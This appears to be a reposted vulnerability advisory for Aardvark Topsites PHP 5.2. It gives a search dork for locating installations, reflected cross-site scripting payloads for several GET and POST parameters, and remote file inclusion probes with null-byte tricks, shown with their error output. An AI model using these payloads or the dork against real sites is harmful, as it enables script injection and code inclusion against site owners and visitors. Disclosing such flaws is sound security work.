facebook facebook twitter rss

Aardvark Topsites PHP 5.2 Multi Vulnerability

Author: indoushka , Published: 11-11-2014
Aardvark Topsites PHP 5.2 Multi Vulnerability
=============================================
Author : indoushka
Vondor : www.p30vel.ir http://www.aardvarktopsitesphp.com/ http://www.avatic.com/
Dork : My Topsites List - Powered by Aardvark Topsites PHP 5.2.1
======================================

Cross site scripting (verified) :

This vulnerability affects /rank/index.php.

Attack details :

URL encoded GET input q was set to 1" onmouseover=prompt(999881) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input email was set to sample%40email.tst" onmouseover=prompt(932713) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input title was set to Mr." onmouseover=prompt(903995) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input u was set to 1" onmouseover=prompt(986160) bad="
The input is reflected inside a tag parameter between double quotes.
URL encoded POST input url was set to #" onmouseover=prompt(915056) //
The input is reflected inside a tag parameter between double quotes.

File inclusion :

URL encoded GET input l was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
Failed opening required '../languages/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php'

URL encoded POST input sql was set to http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg
Error message found:
Failed opening required '../sources/sql/http://some-inexistent-website.acu/some_inexistent_file_with_long_name?%00.jpg.php'

Like us on Facebook :